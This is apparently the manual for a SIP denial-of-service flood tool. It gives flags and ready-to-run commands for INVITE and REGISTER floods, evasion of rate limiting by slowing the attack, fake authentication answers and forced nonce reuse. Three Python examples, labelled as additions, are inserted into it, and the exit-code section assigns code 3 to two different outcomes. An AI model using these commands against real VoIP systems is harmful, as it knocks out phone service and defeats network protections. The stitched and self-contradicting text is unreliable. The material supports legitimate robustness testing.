sipvicious sip dos flood

Summary

SIP flood DoS attacks

What it does

Reproduce, detect and exploit SIP INVITE floods and other SIP-message flood attacks. This tool allows testers to check the robustness of the target SIP entities, with various mutations of the attack: rate limiting to bypass network security protection, monitoring of the target system by default, and several different behaviours for the SIP INVITE flood. The attack may be spread across different SIP extensions or URIs and across different targets.

Tool functionality

The sip dos flood command sends SIP messages in bulk to trigger denial-of-service conditions. For most SIP methods the functionality is simple: send as many of that particular message as possible, as fast as possible, over as many connections as possible. For INVITE, extra behaviour is implemented to trigger different conditions (see the invite-mode flag). By default, a random user/extension is generated for each request sent.

A prober is switched on by default. It periodically sends the same SIP message that is used to initiate the flood, which is known to elicit a response from the target, and uses the replies to tell whether the system starts missing messages or stops responding altogether. The prober records the first response code so that, if it later changes (e.g. from a 200 or 404 to a 5XX server error), the change is reported. If the prober starts missing responses, these are logged as non-fatal errors.

This functionality is the same as that of the individual tool available as sipvicious sip tools ping.
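The prober logic described above, as an added example that is not part of the tool or its documentation: it parses SIP status lines, fixes the first response code as the baseline and classifies every later probe as ok, changed, server error or missed. The sample replies are constructed for the example (the 404 reason phrase is copied from the log above); the Prober class and its method names are assumptions for illustration.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Status line of a SIP response, e.g. "SIP/2.0 404 enumerate me baby"
STATUS_RE = re.compile(r"^SIP/2\.0 (\d{3}) (.*)$")


def parse_status(first_line: str) -> Optional[Tuple[int, str]]:
    """Return (code, reason phrase) for a SIP response status line, None if it is not one."""
    m = STATUS_RE.match(first_line.strip())
    if not m:
        return None
    return int(m.group(1)), m.group(2)


@dataclass
class Prober:
    """Tracks replies to the periodic probe and classifies each one against the baseline."""
    baseline: Optional[int] = None          # status code of the first reply seen
    missed: int = 0                         # probes that timed out
    events: List[Tuple[int, str, object]] = field(default_factory=list)

    def observe(self, seq: int, reply: Optional[str]) -> str:
        """Feed one probe result: the reply's first line, or None when the probe timed out."""
        if reply is None:
            self.missed += 1
            self.events.append((seq, "missed", None))
            return "missed"
        parsed = parse_status(reply)
        if parsed is None:
            self.events.append((seq, "unparseable", reply))
            return "unparseable"
        code, _reason = parsed
        if self.baseline is None:
            self.baseline = code
            self.events.append((seq, "baseline", code))
            return "baseline"
        if code == self.baseline:
            return "ok"
        # Any deviation from the baseline is reported; a 5XX is flagged as a server error.
        kind = "server-error" if 500 <= code < 600 else "changed"
        self.events.append((seq, kind, code))
        return kind

    def security_issue(self) -> bool:
        """True when the target deviated from its baseline or dropped probes."""
        return self.missed > 0 or any(e[1] in ("changed", "server-error") for e in self.events)


# Constructed probe replies (not captured from a real target): the target answers the REGISTER
# probe with 404, then starts dropping probes and finally answers with a 503.
SAMPLE_REPLIES = [
    "SIP/2.0 404 enumerate me baby",
    "SIP/2.0 404 enumerate me baby",
    None,
    None,
    "SIP/2.0 503 Service Unavailable",
]


def run_sample(replies=SAMPLE_REPLIES) -> Prober:
    p = Prober()
    for seq, reply in enumerate(replies, start=1):
        verdict = p.observe(seq, reply)
        print(f"probe {seq}: {reply!r} -> {verdict}")
    return p


if __name__ == "__main__":
    prober = run_sample()
    print("baseline:", prober.baseline, "missed:", prober.missed, "issue:", prober.security_issue())
```

On the constructed sample the baseline is 404, two probes are missed and the final 503 is classified as a server error, which is the condition under which the real tool reports a security issue.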

If registration is done using valid credentials, then an unregister should be sent at the end of the test.

The following is an example logging of the tool when run with the default settings:

INFO[2020-05-28 16:40:28] Starting sip dos flood on udp://demo.sipvicious.pro:5060 with method REGISTER
INFO[2020-05-28 16:40:29] prober for udp://demo.sipvicious.pro:5060 started
INFO[2020-05-28 16:40:30] prober response for udp://demo.sipvicious.pro:5060 received, checking for SIP/2.0 404 enumerate me baby
INFO[2020-05-28 16:40:31] 153546/s (62.3 MiB/s)
INFO[2020-05-28 16:40:32] 151662/s (61.6 MiB/s)
INFO[2020-05-28 16:40:33] 154512/s (62.9 MiB/s)
INFO[2020-05-28 16:40:34] 161444/s (65.7 MiB/s)

Command format

sipvicious sip dos flood <target1 [target2 [target3 ...]]> [flags]

Flags

      --auth-mode string      Specify how to handle authentication requests (fake|real|ignore); default: ignore unless the -u flag is present
      --close-conn            Close the connection after sending each message, instead of keeping it alive
  -c, --conn-count int        Number of sockets to use (per target) (default 30)
  -u, --credentials string    Set the username and password in the following format: username:password (e.g. 1000:test123)
  -d, --dictionary string     Specify a file containing extensions or SIP URIs to hit
  -D, --domain string         override domain name for the SIP address
      --duration duration     Set the duration of the attack
  -e, --extension string      Specify a target extension or SIP URI to hit; if not specified, random numeric extensions are used
  -f, --from string           specify a from extension or SIP URI to set the from address; if not specified, a random numeric extension is used
      --invite-mode strings   Specify how to behave during an INVITE flood; format: action or action:duration; (ignore|hangup-trying|hangup-ringing|hangup-call|never-hangup); default: ignore
      --max-requests int      Set the maximum number of requests to send
  -m, --method string         Set the method to flood the target with; (REGISTER|SUBSCRIBE|NOTIFY|PUBLISH|MESSAGE|INVITE|OPTIONS) (default "REGISTER")
      --no-prober             Do not monitor the system by sending ping messages to check for errors or timeouts (on by default)
      --nonce-reuse string    Choose between detecting nonce reuse capability, forcing nonce reuse or disabling nonce reuse. Defaults to automatic detection; (auto|force|disable) (default "auto")
      --rate string           Specify how many packets to send for each period of time; format: packets/duration; e.g. 100/30ms
      --register              Maintain a registration throughout the attack; requires -u
      --static-branch         Do not randomize the branch value
      --static-cseq           Do not increment CSeq numbers

Flags inherited from parent commands

      --ca-cert string       TLS CA Certificate
      --client-cert string   TLS client certificate
      --client-key string    TLS client private key
  -C, --config string        configuration file to use (may be JSON, TOML or YAML)
      --debug                set log level to debug
      --logfile string       specify a log filename
      --srtp string          specify if either none, dtls or sdes to enforce SRTP for calls; format: method or method:parameters; see full documentation for details (default "none")
      --templates string     Directory to search for template overrides (default ".")
      --tls-key-log string   TLS key log, - for stdout

Examples

sipvicious sip dos flood udp://target:5060 -e 10000
sipvicious sip dos flood tcp://target:5060 -c 80 --duration 15m --rate 100/10ms  -m INVITE
sipvicious sip dos flood tls://target:5060 -c 200 -u 1234:password --nonce-reuse disable \
	--register -m INVITE --invite-mode hangup-ringing:30s --invite-mode hangup-call
sipvicious sip dos flood udp://target1:5060 tcp://target1:5060 --auth-mode fake --nonce-reuse force

Advanced examples

# maintain a registration throughout the flood attack using the credentials given
sipvicious sip dos flood udp://demo.sipvicious.pro:5060 -u 1000:1500 --register -e 2000

# bypass network security rate limiting by slowing down and prolonging the attack
sipvicious sip dos flood udp://demo.sipvicious.pro:5060 -c 100 --duration 100m --rate 1/20ms -e 2000

# target several domains with different extensions limiting maximum requests
sipvicious sip dos flood udp://demo.sipvicious.pro:5060 tcp://demo.sipvicious.pro:5060 tls://demo.sipvicious.pro:5060 -e 2000,3000,4000 --max-requests 1000

# using subscribe method and not incrementing cseq no. with no ping probes
sipvicious sip dos flood udp://demo.sipvicious.pro:5060 -e 2000 -m subscribe --static-cseq --no-prober

# flood using fake authentication handling and forcing nonce-reusing
sipvicious sip dos flood udp://demo.sipvicious.pro:5060 -e 2000 --auth-mode fake --nonce-reuse force

# flood using invite method with invite mode set to both call-hangups and hangup-ringing and also using 100 sockets, forcing a specific domain while maintaining a static branch number
sipvicious sip dos flood udp://demo.sipvicious.pro:5060 -m invite --static-branch --invite-mode hangup-call --invite-mode hangup-ringing:60s --conn-count 100 --domain siteonsip.tld -e 2000

# using a list of extensions to target and terminating connections after sending a message
sipvicious sip dos flood udp://demo.sipvicious.pro:5060 --dictionary extensions.txt --close-conn

# prolong the flood attack using the never-hangup mode during an INVITE flood
sipvicious sip dos flood udp://demo.sipvicious.pro:5060 -u 1000:1500 --register -d ext.txt --invite-mode never-hangup -m invite

# using the publish method for the flood attack
sipvicious sip dos flood udp://demo.sipvicious.pro:5060 -e 2000 --nonce-reuse disable -m publish

Exit codes

This tool returns exit code 3 (security issue detected) when the prober detects SIP-level or network-level errors. It returns exit code 3 (network connectivity problems) when the connection fails before the attack is started.

Flag: auth-mode

Specify how authentication challenges are handled: fake, real or ignore. By default, authentication challenges are ignored unless credentials are specified using the -u flag, in which case the default is real, i.e. the challenge is answered using the given credentials. When fake is specified, a challenge response is generated based on the challenge, but no real credentials are used. This has the benefit of producing a failed authentication attempt, thus possibly triggering a DoS at the authentication stage, while requiring no extra calculations on the attacker's side.

Note: authentication may slow down the attack, so ignore is the preferred value when speed is needed.

Flag: ca-cert

The CA cert can be passed when making use of client certificate authentication. The file should be formatted as PEM.

Flag: client-cert

The client certificate must be passed when making use of client certificate authentication. The file should be formatted as PEM.

Flag: client-key

The client key must be passed when making use of client certificate authentication. The file should be formatted as PEM.

Flag: close-conn

The default connection behaviour is to try to keep all connections alive or, in the case of UDP, to reuse the same socket. This flag overrides this behaviour so that the connection is closed after each message is sent. This can uncover vulnerabilities related to socket handling in relation to SIP signalling.

Flag: config

Specify a configuration file, which may be in JSON, TOML or YAML format. To get the default settings and find out which settings are available, run the sipvicious utils dump config command. This is typically used to create a template configuration that can then be edited as needed.

Settings from the configuration file are overridden when the corresponding flag is explicitly set on the command line.

Flag: conn-count

The conn-count flag sets how many sockets are used concurrently (per target) to spread out the attack.

Flag: credentials

Specify valid credentials so that the SIP flood is authenticated. The format is username:password (e.g. 1000:test123). When not specified, authentication challenges are ignored by default; see the auth-mode flag to send fake challenge responses instead.

Note: authentication may slow down the attack.

Flag: debug

Tells the logger to print out debug messages.

Flag: dictionary

Specify a file containing SIP extensions or SIP URIs to be used as targets of the flood. This flag is useful when spreading a SIP INVITE flood across different targets behind a SIP proxy. Example contents:

1234
testuser
sip:testuser2@example.org

Note that although this may be used with other SIP methods, such as REGISTER with valid credentials, this may lead to unexpected behaviour from a SIP protocol point of view.

This flag may not be used together with the extension flag.

Flag: domain

A domain name can be specified so that the SIP URI contains that particular domain rather than the one specified as the target. This is useful for targets that expect a particular domain name.

Flag: duration

Specify the maximum duration of the attack so that it stops after a certain time.

Flag: extension

This flag allows users to target a particular extension, overriding the default behaviour of targeting random extensions. The value can be either just the SIP extension/username (e.g. 1234) or a SIP URI (e.g. sip:user@example.org).

This flag may not be used together with the dictionary flag.

Flag: from

This flag allows users to set the From address, overriding the default behaviour of setting a random extension or the username in the credentials when one is provided. The value can be either just the SIP extension/username (e.g. 1234) or a SIP URI (e.g. sip:user@example.org).

Flag: invite-mode

The flag invite-mode allows one to specify how to behave during an INVITE flood. The value of this flag could be one of the following actions:

  • ignore which does not wait for SIP INVITE responses; this is the default
  • hangup-trying which sends a CANCEL as soon as a 100 Trying message is received
  • hangup-ringing which sends a CANCEL as soon as a 180 Ringing is received
  • hangup-call which hangs up (by sending a BYE) when a call is picked up (i.e. when a 200 OK is received)
  • never-hangup which handles the call flow normally without hanging up

Additionally, the action may be followed by a colon and a duration (e.g. 2s or 300ms), in which case the action is taken that long after the triggering response is received. For example, hangup-ringing:300ms sends the CANCEL 300 milliseconds after the 180 Ringing arrives.

NOTE: The following invite-mode values cannot be combined with other invite-mode values:

  • ignore
  • never-hangup
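The invite-mode rules above, modelled as an added example that is not the tool's own code: the parser accepts the repeated action or action:duration values, enforces that ignore and never-hangup stand alone, and a small simulation works out which request (CANCEL or BYE) ends a call given a constructed sequence of timed responses. The function names and the call flow are assumptions made for the example.

```python
import re
from typing import Dict, List, Optional, Tuple

# Which response each action waits for and what it sends, per the invite-mode description.
TRIGGERS: Dict[str, Tuple[int, str]] = {
    "hangup-trying": (100, "CANCEL"),
    "hangup-ringing": (180, "CANCEL"),
    "hangup-call": (200, "BYE"),
}
EXCLUSIVE = {"ignore", "never-hangup"}   # cannot be combined with any other mode

DURATION_RE = re.compile(r"^(\d+(?:\.\d+)?)(ms|s|m)$")
UNIT_SECONDS = {"ms": 0.001, "s": 1.0, "m": 60.0}


def parse_duration(text: str) -> float:
    """Convert a duration such as 300ms, 2s or 15m to seconds."""
    m = DURATION_RE.match(text)
    if not m:
        raise ValueError(f"bad duration: {text!r}")
    return float(m.group(1)) * UNIT_SECONDS[m.group(2)]


def parse_invite_modes(values: List[str]) -> List[Tuple[str, float]]:
    """Parse repeated --invite-mode values (action or action:duration); enforce the combination rule."""
    modes = []
    for value in values:
        action, _, delay = value.partition(":")
        if action not in TRIGGERS and action not in EXCLUSIVE:
            raise ValueError(f"unknown invite-mode action: {action!r}")
        modes.append((action, parse_duration(delay) if delay else 0.0))
    actions = {a for a, _ in modes}
    if actions & EXCLUSIVE and len(actions) > 1:
        raise ValueError("ignore and never-hangup cannot be combined with other invite-mode values")
    return modes


def plan_hangup(modes: List[Tuple[str, float]],
                responses: List[Tuple[float, int]]) -> Optional[Tuple[float, str]]:
    """Simulate one INVITE transaction.

    responses are constructed (seconds, status code) pairs as they arrive from the callee.
    Returns (time, request) of the request that ends the call, or None when no mode fires
    (ignore, never-hangup, or the call never reached a trigger response).
    """
    answered_at: Optional[float] = None
    pending: List[Tuple[float, str]] = []
    for t, code in responses:
        if code == 200 and answered_at is None:
            answered_at = t
        for action, delay in modes:
            if action in TRIGGERS and TRIGGERS[action][0] == code:
                pending.append((t + delay, TRIGGERS[action][1]))
    for fire_at, request in sorted(pending):
        # CANCEL is only meaningful before the INVITE is answered; BYE only once it has been.
        if request == "CANCEL" and (answered_at is None or fire_at < answered_at):
            return fire_at, request
        if request == "BYE" and answered_at is not None and fire_at >= answered_at:
            return fire_at, request
    return None


if __name__ == "__main__":
    # Constructed call flow: 100 Trying at 0s, 180 Ringing at 1s, 200 OK at 5s.
    flow = [(0.0, 100), (1.0, 180), (5.0, 200)]
    modes = parse_invite_modes(["hangup-ringing:30s", "hangup-call"])
    print(plan_hangup(modes, flow))        # the 200 OK arrives before the 30s CANCEL, so BYE at 5s
    print(plan_hangup(modes, flow[:2]))    # never answered, so CANCEL 30s after the 180 Ringing
```

With hangup-ringing:30s combined with hangup-call, as in the examples above, a call that is answered within 30 seconds is ended with a BYE, while one left ringing is cancelled after 30 seconds; this is why the two can be combined while ignore and never-hangup cannot.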

Flag: logfile

When the logfile flag is specified, a log file is created in the location specified and logs are generated in this file instead of being sent to standard output. If the filename ends with a .json file extension, then the output format is in JSON, otherwise it defaults to text format.

Flag: max-requests

Specify the maximum number of messages to send before stopping the attack.

Flag: method

The SIP flood tool supports the following SIP methods:

  • REGISTER
  • SUBSCRIBE
  • NOTIFY
  • PUBLISH
  • MESSAGE
  • INVITE
  • OPTIONS

In the case of INVITE, the invite-mode flag specifies extra behaviour that is specific to this method.

Flag: no-prober

Switches off the default prober which sends a SIP message to detect errors and issues during an attack.

Flag: nonce-reuse

If a server accepts nonce reuse, an attack involving authentication can be sped up by reusing the nonce from an earlier challenge instead of waiting for a new challenge for every request. By default (auto), the tool detects whether the target supports this by sampling responses when correct credentials are given using the -u flag, and makes use of nonce reuse if the target supports it. Nonce reuse can be forced by passing force, or completely disabled by passing disable to the nonce-reuse flag.

Disabling nonce-reuse may be useful when trying to reproduce a DoS issue involving nonce generation.

Warning: disabling nonce-reuse slows down any attack.
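The auth-mode (real versus fake challenge responses) and nonce-reuse behaviour described above, as an added example that is not the tool's own code: it computes the SIP digest response from a WWW-Authenticate challenge, builds a fake answer that reuses the challenge's realm and nonce with a random response, and runs both against a minimal in-process registrar that can be configured to accept or reject a nonce that is used twice. The Registrar class, the probing functions and the credentials 1000:test123 against the demo.sipvicious.pro realm are assumptions for the example; no network traffic is sent.

```python
import hashlib
import re
import secrets
from typing import Dict, Optional, Tuple

PARAM_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^\s,]+))')


def parse_digest_params(header: str) -> Dict[str, str]:
    """Parse the parameters of a Digest WWW-Authenticate or Authorization header value."""
    scheme, _, rest = header.partition(" ")
    if scheme != "Digest":
        raise ValueError("not a Digest header")
    return {k: q if q else u for k, q, u in PARAM_RE.findall(rest)}


def md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(method, uri, username, password, realm, nonce) -> str:
    """RFC 2617 MD5 digest without qop, the form used by SIP (RFC 3261 section 22)."""
    ha1 = md5hex(f"{username}:{realm}:{password}")
    ha2 = md5hex(f"{method}:{uri}")
    return md5hex(f"{ha1}:{nonce}:{ha2}")


def build_authorization(mode, challenge, method, uri, username, password) -> str:
    """Answer a challenge the way auth-mode real or fake would."""
    p = parse_digest_params(challenge)
    if mode == "real":
        response = digest_response(method, uri, username, password, p["realm"], p["nonce"])
    elif mode == "fake":
        # Assumption: the fake answer keeps the challenge's realm and nonce but carries a random
        # response, so the server does a full (failing) digest check while we computed nothing.
        response = secrets.token_hex(16)
    else:
        raise ValueError(mode)
    return (f'Digest username="{username}", realm="{p["realm"]}", nonce="{p["nonce"]}", '
            f'uri="{uri}", response="{response}", algorithm=MD5')


class Registrar:
    """Minimal digest-checking registrar to show what the server sees (not a real SIP stack)."""

    def __init__(self, username, password, realm, allow_nonce_reuse: bool):
        self.username, self.password, self.realm = username, password, realm
        self.allow_nonce_reuse = allow_nonce_reuse
        self.nonce_uses: Dict[str, int] = {}   # nonce -> number of requests that used it

    def challenge(self) -> str:
        nonce = secrets.token_hex(8)
        self.nonce_uses[nonce] = 0
        return f'Digest realm="{self.realm}", nonce="{nonce}", algorithm=MD5'

    def handle(self, method, uri, authorization: Optional[str]) -> Tuple[int, Optional[str]]:
        """Return (status, WWW-Authenticate) for one request."""
        if authorization is None:
            return 401, self.challenge()
        p = parse_digest_params(authorization)
        nonce = p.get("nonce", "")
        if nonce not in self.nonce_uses:
            return 401, self.challenge()
        if self.nonce_uses[nonce] > 0 and not self.allow_nonce_reuse:
            return 401, self.challenge()        # nonce already used: client must re-authenticate
        self.nonce_uses[nonce] += 1
        expected = digest_response(method, uri, self.username, self.password, self.realm, nonce)
        if p.get("username") == self.username and p.get("response") == expected:
            return 200, None
        return 403, None


def register(server, mode, username, password, uri="sip:demo.sipvicious.pro") -> int:
    """One REGISTER: unauthenticated request, then the challenge answered per auth-mode."""
    status, challenge = server.handle("REGISTER", uri, None)
    if status != 401:
        raise RuntimeError("expected a challenge")
    auth = build_authorization(mode, challenge, "REGISTER", uri, username, password)
    status, _ = server.handle("REGISTER", uri, auth)
    return status


def nonce_reuse_supported(server, username, password, uri="sip:demo.sipvicious.pro") -> bool:
    """What auto detection does: answer one challenge twice and see if the second is accepted."""
    _, challenge = server.handle("REGISTER", uri, None)
    auth = build_authorization("real", challenge, "REGISTER", uri, username, password)
    first, _ = server.handle("REGISTER", uri, auth)
    second, _ = server.handle("REGISTER", uri, auth)    # same nonce, same response
    return first == 200 and second == 200


if __name__ == "__main__":
    srv = Registrar("1000", "test123", "demo.sipvicious.pro", allow_nonce_reuse=True)
    print("real:", register(srv, "real", "1000", "test123"))
    print("fake:", register(srv, "fake", "1000", None))
    print("nonce reuse (lenient):", nonce_reuse_supported(srv, "1000", "test123"))
    strict = Registrar("1000", "test123", "demo.sipvicious.pro", allow_nonce_reuse=False)
    print("nonce reuse (strict):", nonce_reuse_supported(strict, "1000", "test123"))
```

Against the lenient registrar the real answer is accepted and the same Authorization header is accepted a second time, which is what lets the flood skip the challenge round trip; the strict registrar rejects the second use, so forcing nonce reuse against it only yields 401s. The fake answer always fails but still costs the server a digest computation.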

Flag: rate

The rate flag limits the attack to at most the given rate. The format is packets/duration; a value of 100/30ms means that 100 packets are spread evenly across 30 milliseconds, over all the connections to each target.

Flag: register

The register flag requires credentials (-u) so that a REGISTER message is sent to authenticate with the registrar before starting the attack. The registration is then maintained (refreshed) as per the SIP standard, so that it does not expire during the attack.

Flag: srtp

When specified, the srtp flag sets the SRTP mode. By default, outgoing calls do not use SRTP, while incoming calls handle SRTP automatically depending on the SDP body of the incoming INVITE. When srtp is set to none, incoming calls do not use SRTP either, regardless of the SDP body of the incoming INVITE. The mode can also be dtls or sdes; in both cases the parameters are optional and are generated randomly as needed.

Options for both dtls and sdes mode may be passed after a colon. For example:

  • TODO: --srtp dtls:cert.crt:cert.key[:ca.crt] where the first argument after the mode (dtls) is the public certificate cert.crt, then the private key cert.key and finally, the optional certificate authority file ca.crt
  • --srtp sdes:d0RmdmcmVCspeEc3QGZiNWpVLFJhQX1cfHAwJSoj where the argument is the base64-encoded master key concatenated with the master salt.

Note that in the sdes case the decoded master key plus master salt must have a valid length, which is 30 octets (16-octet key followed by 14-octet salt) for the default crypto-suite AES_CM_128_HMAC_SHA1_80.

Flag: static-branch

The static-branch flag keeps the Via branch parameter constant instead of randomizing it for every request. This may lead to DoS conditions that are not exhibited when using random or incremental values.

Flag: static-cseq

The static-cseq flag keeps the CSeq number constant instead of incrementing it for every request. This may lead to DoS conditions that are not exhibited when using random or incremental values.

Flag: templates

Allows one to set the template directory which is used to load (or save) the SIP templates.

To get the default SIP templates, make use of the sipvicious sip utils dump templates command.

Flag: tls-key-log

The tls-key-log flag writes the TLS session secrets to the given file (- for stdout) so that the TLS stream can be decrypted by tools that support the key log format, such as Wireshark.

Future enhancements

Rate limit test

Testing of different rate limits would be useful to identify the ideal sending rate. A specific function could be present to find the right sending rate that is allowed by the target system. An extended feature would be to be able to automatically find that rate and then intelligently stay under it without any configuration of the tool.

Update Dictionary to support credentials

The current dictionary flag is useful for an INVITE flood and perhaps some other methods, but not so much for a REGISTER flood with credentials, where it only makes sense to register to the specific account the credentials belong to. Extending the dictionary format to carry credentials per entry would address this.

Spread attack across different authenticated users

Functionality to support spreading the flooding across different users may be needed to bypass user specific checks or limitations.